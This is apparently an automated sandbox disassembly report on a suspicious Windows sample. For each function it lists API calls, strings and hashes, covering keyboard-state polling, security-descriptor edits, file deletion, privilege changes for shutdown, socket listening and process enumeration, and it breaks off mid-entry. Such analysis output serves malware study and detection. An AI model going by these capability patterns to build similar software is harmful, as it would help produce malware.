                                                                  • Instruction Fuzzy Hash: 7672A172E04219CBDB26CF59E880BAEB7B5FF54310F15816AE805EB390DB309E45DB90
                                                                  APIs
                                                                    • Part of subcall function 0038ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0038ABD7
                                                                    • Part of subcall function 0038ABBB: GetLastError.KERNEL32(?,0038A69F,?,?,?), ref: 0038ABE1
                                                                    • Part of subcall function 0038ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0038A69F,?,?,?), ref: 0038ABF0
                                                                    • Part of subcall function 0038ABBB: HeapAlloc.KERNEL32(00000000,?,0038A69F,?,?,?), ref: 0038ABF7
                                                                    • Part of subcall function 0038ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0038AC0E
                                                                    • Part of subcall function 0038AC56: GetProcessHeap.KERNEL32(00000008,0038A6B5,00000000,00000000,?,0038A6B5,?), ref: 0038AC62
                                                                    • Part of subcall function 0038AC56: HeapAlloc.KERNEL32(00000000,?,0038A6B5,?), ref: 0038AC69
                                                                    • Part of subcall function 0038AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0038A6B5,?), ref: 0038AC7A
                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0038A6D0
                                                                  • _memset.LIBCMT ref: 0038A6E5
                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0038A704
                                                                  • GetLengthSid.ADVAPI32(?), ref: 0038A715
                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 0038A752
                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0038A76E
                                                                  • GetLengthSid.ADVAPI32(?), ref: 0038A78B
                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0038A79A
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0038A7A1
                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0038A7C2
                                                                  • CopySid.ADVAPI32(00000000), ref: 0038A7C9
                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0038A7FA
                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0038A820
                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0038A834
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                  • String ID:
                                                                  • API String ID: 3996160137-0
                                                                  • Opcode ID: 6fb22a2d412affcf821e78df86535e69f8836c5634f3570d6e908f9c29ad87db
                                                                  • Instruction ID: d834c916c47d2e0556981011d95b4174af5eb97e094d890c2e8c1c35836f505a
                                                                  • Opcode Fuzzy Hash: 6fb22a2d412affcf821e78df86535e69f8836c5634f3570d6e908f9c29ad87db
                                                                  • Instruction Fuzzy Hash: 03514071901609AFEF12DFA5DC44EEEBBB9FF44300F04816AF915AB250D7349A05CB61
                                                                  APIs
                                                                    • Part of subcall function 00396EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00395FA6,?), ref: 00396ED8
                                                                    • Part of subcall function 003972CB: GetFileAttributesW.KERNEL32(?,00396019), ref: 003972CC
                                                                  • _wcscat.LIBCMT ref: 00396441
                                                                  • __wsplitpath.LIBCMT ref: 0039645F
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00396474
                                                                  • _wcscpy.LIBCMT ref: 003964A3
                                                                  • _wcscat.LIBCMT ref: 003964B8
                                                                  • _wcscat.LIBCMT ref: 003964CA
                                                                  • DeleteFileW.KERNEL32(?), ref: 003964DA
                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 003964EB
                                                                  • FindClose.KERNEL32(00000000), ref: 00396506
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                  • String ID: \*.*
                                                                  • API String ID: 2643075503-1173974218
                                                                  • Opcode ID: 7d1e910989eb067094098bd7d510f28d14c7ea929d9af816024b923dc2695697
                                                                  • Instruction ID: 43e46254ecc2a1697653573e69422c3885463e153cd0bc04e5581d11ade29288
                                                                  • Opcode Fuzzy Hash: 7d1e910989eb067094098bd7d510f28d14c7ea929d9af816024b923dc2695697
                                                                  • Instruction Fuzzy Hash: E93181B2409384AAC732DBE48885EDBB7DCAF56310F44492EF5D8C7141EA35E50987A7
                                                                  APIs
                                                                    • Part of subcall function 003B3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003B2BB5,?,?), ref: 003B3C1D
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003B328E
                                                                    • Part of subcall function 0035936C: __swprintf.LIBCMT ref: 003593AB
                                                                    • Part of subcall function 0035936C: __itow.LIBCMT ref: 003593DF
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 003B332D
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 003B33C5
                                                                  • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 003B3604
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 003B3611
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                  • String ID:
                                                                  • API String ID: 1240663315-0
                                                                  • Opcode ID: 5923b8d5e973bf8e7e10a91b84f2c857306e614e8330b632c855ffdd930e5f39
                                                                  • Instruction ID: d7b00b450672b5d93dcec7acf71ced89e22236419cec9d34c537fe11335771bc
                                                                  • Opcode Fuzzy Hash: 5923b8d5e973bf8e7e10a91b84f2c857306e614e8330b632c855ffdd930e5f39
                                                                  • Instruction Fuzzy Hash: 3EE16E35604210AFCB16DF29C895E6EBBE8EF89314F04896DF94ADB261DB30ED05CB51
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?), ref: 00392B5F
                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00392BE0
                                                                  • GetKeyState.USER32(000000A0), ref: 00392BFB
                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00392C15
                                                                  • GetKeyState.USER32(000000A1), ref: 00392C2A
                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00392C42
                                                                  • GetKeyState.USER32(00000011), ref: 00392C54
                                                                  • GetAsyncKeyState.USER32(00000012), ref: 00392C6C
                                                                  • GetKeyState.USER32(00000012), ref: 00392C7E
                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00392C96
                                                                  • GetKeyState.USER32(0000005B), ref: 00392CA8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: State$Async$Keyboard
                                                                  • String ID:
                                                                  • API String ID: 541375521-0
                                                                  • Opcode ID: ec1cb9efa121e1231e4cafbb934ee76a07c541537cfdd0a9a8e167a0bc39331b
                                                                  • Instruction ID: 640702954e167ed04eaebd284eb6a29cf8b778f2055d18e20cef879d3add99bc
                                                                  • Opcode Fuzzy Hash: ec1cb9efa121e1231e4cafbb934ee76a07c541537cfdd0a9a8e167a0bc39331b
                                                                  • Instruction Fuzzy Hash: E341A834904FCA7DFF379B6498043ABBFE56B11344F09409AD9C6562C2DB949DC8CBA2
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                  • String ID:
                                                                  • API String ID: 1737998785-0
                                                                  • Opcode ID: 09b0219780dd56f957ec995886e22d4bef817c4ed6214d9cb37be43d0e692e4d
                                                                  • Instruction ID: b0097fdd61729a33e9701195d53d59973c8112dcaf797b2a4dc9ad0ed04c833f
                                                                  • Opcode Fuzzy Hash: 09b0219780dd56f957ec995886e22d4bef817c4ed6214d9cb37be43d0e692e4d
                                                                  • Instruction Fuzzy Hash: 72219C31301610AFDB13AF64EC4AB6E77ACFF45751F05841AF90ADB2A1CB34E9008B94
                                                                  APIs
                                                                    • Part of subcall function 00389ABF: CLSIDFromProgID.OLE32 ref: 00389ADC
                                                                    • Part of subcall function 00389ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00389AF7
                                                                    • Part of subcall function 00389ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00389B05
                                                                    • Part of subcall function 00389ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00389B15
                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 003AC235
                                                                  • _memset.LIBCMT ref: 003AC242
                                                                  • _memset.LIBCMT ref: 003AC360
                                                                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 003AC38C
                                                                  • CoTaskMemFree.OLE32(?), ref: 003AC397
                                                                  Strings
                                                                  • NULL Pointer assignment, xrefs: 003AC3E5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                  • String ID: NULL Pointer assignment
                                                                  • API String ID: 1300414916-2785691316
                                                                  • Opcode ID: c7027b03cd3a413931d6d43094830c41431ae12732820483571f7d3f377d58d0
                                                                  • Instruction ID: edf96a8b92e8ec24540ea2f36bf43babc233fd9f12c32d2021bbc3d4efe2f71e
                                                                  • Opcode Fuzzy Hash: c7027b03cd3a413931d6d43094830c41431ae12732820483571f7d3f377d58d0
                                                                  • Instruction Fuzzy Hash: 6C912A71D00218ABDF12DF95DC91EDEBBB8EF09710F10815AF915AB291DB705A45CFA0
                                                                  APIs
                                                                    • Part of subcall function 0038B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0038B180
                                                                    • Part of subcall function 0038B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0038B1AD
                                                                    • Part of subcall function 0038B134: GetLastError.KERNEL32 ref: 0038B1BA
                                                                  • ExitWindowsEx.USER32(?,00000000), ref: 00397A0F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                  • String ID: $@$SeShutdownPrivilege
                                                                  • API String ID: 2234035333-194228
                                                                  • Opcode ID: 0e2475ab0e1699f1aa38b63ddd875687f170ffb34b585dcdf7eb4995451a67d6
                                                                  • Instruction ID: eef4fbcbde84fe250423523733833bf1104bccdd1a7a20791375e4346897232c
                                                                  • Opcode Fuzzy Hash: 0e2475ab0e1699f1aa38b63ddd875687f170ffb34b585dcdf7eb4995451a67d6
                                                                  • Instruction Fuzzy Hash: 1C012B716793126AFF2B2674DC8BBBF735C9B00390F250825FD43E62C2D6649E0082B4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ERCP$ICTRLCREATETREEVIEW$VUUU$VUUU$VUUU$VUUU$?
                                                                  • API String ID: 0-13670414
                                                                  • Opcode ID: 758a5ae261ec5cf009cdf0640aff7598d16d8d0254c890f773ac3eacd7878a4c
                                                                  • Instruction ID: 2fbab9e769da6c03db54940bc4ae04f5c32d2031c5e81f4ded61679fe9c5af01
                                                                  • Opcode Fuzzy Hash: 758a5ae261ec5cf009cdf0640aff7598d16d8d0254c890f773ac3eacd7878a4c
                                                                  • Instruction Fuzzy Hash: D792CE72E1061ACBDF26CF58C840BADB3B5BB54311F16829AEC16AB390D7309D85DF91
                                                                  APIs
                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 003A8CA8
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 003A8CB7
                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 003A8CD3
                                                                  • listen.WSOCK32(00000000,00000005), ref: 003A8CE2
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 003A8CFC
                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 003A8D10
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$bindclosesocketlistensocket
                                                                  • String ID:
                                                                  • API String ID: 1279440585-0
                                                                  • Opcode ID: 1ebc3a9e63eee61d5b60692b5d1766ebe33f701f802163f1e9aa93f8549eea53
                                                                  • Instruction ID: 532921f8f68ac1bab4a8b4d84589d58076fb3baa0fb1691570db0f87d34427e7
                                                                  • Opcode Fuzzy Hash: 1ebc3a9e63eee61d5b60692b5d1766ebe33f701f802163f1e9aa93f8549eea53
                                                                  • Instruction Fuzzy Hash: 8121EF316002009FCB12EF28DC85B6EB7ADEF49720F118159F916AB2E2CB30AD018B51
                                                                  APIs
                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00396554
                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00396564
                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00396583
                                                                  • __wsplitpath.LIBCMT ref: 003965A7
                                                                  • _wcscat.LIBCMT ref: 003965BA
                                                                  • CloseHandle.KERNEL32(00000000,?,00000000), ref: 003965F9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  Similarity
                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                  • String ID:
                                                                  • API String ID: 1605983538-0
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 003913DC
                                                                  Similarity
                                                                  • API ID: lstrlen
                                                                  • String ID: ($,2@$<2@$|
                                                                  • API String ID: 1659193697-2353487846
                                                                  APIs
                                                                    • Part of subcall function 003AA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 003AA84E
                                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 003A9296
                                                                  • WSAGetLastError.WSOCK32(00000000,00000000), ref: 003A92B9
                                                                  Similarity
                                                                  • API ID: ErrorLastinet_addrsocket
                                                                  • String ID:
                                                                  • API String ID: 4170576061-0
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0039EB8A
                                                                  • _wcscmp.LIBCMT ref: 0039EBBA
                                                                  • _wcscmp.LIBCMT ref: 0039EBCF
                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0039EBE0
                                                                  • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0039EC0E
                                                                  Similarity
                                                                  • API ID: Find$File_wcscmp$CloseFirstNext
                                                                  • String ID:
                                                                  • API String ID: 2387731787-0
                                                                  Similarity
                                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                  • String ID:
                                                                  • API String ID: 292994002-0
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,0036E014,771B0AE0,0036DEF1,003EDC38,?,?), ref: 0036E02C
                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0036E03E
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                                  • API String ID: 2574300362-192647395
                                                                  Similarity
                                                                  • API ID: Exception@8Throwstd::exception::exception
                                                                  • String ID: @$ A$ A$ A
                                                                  • API String ID: 3728558374-1712067833
                                                                  APIs
                                                                    • Part of subcall function 0036B34E: GetWindowLongW.USER32(?,000000EB), ref: 0036B35F
                                                                  • DefDlgProcW.USER32(?,?,?,?,?), ref: 0036B22F
                                                                    • Part of subcall function 0036B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0036B5A5
                                                                  Similarity
                                                                  • API ID: Proc$LongWindow
                                                                  • String ID:
                                                                  • API String ID: 2749884682-0
                                                                  APIs
                                                                  • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,003A43BF,00000000), ref: 003A4FA6
                                                                  • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 003A4FD2
                                                                  Similarity
                                                                  • API ID: Internet$AvailableDataFileQueryRead
                                                                  • String ID:
                                                                  • API String ID: 599397726-0
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID: \Q@
                                                                  • API String ID: 4104443479-1335567171
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0039E20D
                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0039E267
                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0039E2B4
                                                                  Similarity
                                                                  • API ID: ErrorMode$DiskFreeSpace
                                                                  • String ID:
                                                                  • API String ID: 1682464887-0
                                                                  APIs
                                                                    • Part of subcall function 0036F4EA: std::exception::exception.LIBCMT ref: 0036F51E
                                                                    • Part of subcall function 0036F4EA: __CxxThrowException@8.LIBCMT ref: 0036F533
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0038B180
                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0038B1AD
                                                                  • GetLastError.KERNEL32 ref: 0038B1BA
                                                                  Similarity
                                                                  • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                  • String ID:
                                                                  • API String ID: 1922334811-0
                                                                  • Opcode ID: 6b770fb41f926e1e15e5c5c54362fbb0fed0acb57b60f25a00b2363559ecfd5a
                                                                  • Instruction ID: c7ce95d356d61ef607661b94df529a89a24af868efdc8c11c139360f80801278
                                                                  • Opcode Fuzzy Hash: 6b770fb41f926e1e15e5c5c54362fbb0fed0acb57b60f25a00b2363559ecfd5a
                                                                  • Instruction Fuzzy Hash: 0D11BCB2400305AFE719AF64EC89D2BB7BCFF44310B20852EE0569B641DB70FC418B60
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00396623
                                                                  • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00396664
                                                                  • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0039666F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CloseControlCreateDeviceFileHandle
                                                                  • String ID:
                                                                  • API String ID: 33631002-0
                                                                  • Opcode ID: 763122e1ad38ac3ece77aa93edb505b119bc8959331b5647df261f4f0a13fbca
                                                                  • Instruction ID: ae7b2303fcabe7a917409f6987673deea609c436c01e5dec1cc8c97764191976
                                                                  • Opcode Fuzzy Hash: 763122e1ad38ac3ece77aa93edb505b119bc8959331b5647df261f4f0a13fbca
                                                                  • Instruction Fuzzy Hash: 96111E71E01228BFDB118FA9EC45FAEBBBCEB45B50F104156F900E6290D7B05A058BA5
                                                                  APIs
                                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00397223
                                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0039723A
                                                                  • FreeSid.ADVAPI32(?), ref: 0039724A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                  • String ID:
                                                                  • API String ID: 3429775523-0
                                                                  • Opcode ID: d7647a645fae4fbbfac6dcbf7220beea33b2975708c6f7a9933c2fbcf398287d
                                                                  • Instruction ID: 70fe18c8f13a37c0629a83c2707a8edf55d7a69ddcb24a4974988533d53d0cd8
                                                                  • Opcode Fuzzy Hash: d7647a645fae4fbbfac6dcbf7220beea33b2975708c6f7a9933c2fbcf398287d
                                                                  • Instruction Fuzzy Hash: 84F01275915209BFDF05DFE4DD89AEDBBBCEF48301F104469A502E2191E27056448B10
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0039F599
                                                                  • FindClose.KERNEL32(00000000), ref: 0039F5C9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Find$CloseFileFirst
                                                                  • String ID:
                                                                  • API String ID: 2295610775-0
                                                                  • Opcode ID: c91ed5c87b287b8b888c3495c021ebfd91798691e55c6b775a6cb6ae66e4cfd7
                                                                  • Instruction ID: 40105ddeaacff9e9f7f952edcf2813a08cfc75842a0682508ee15dbb9b57c40b
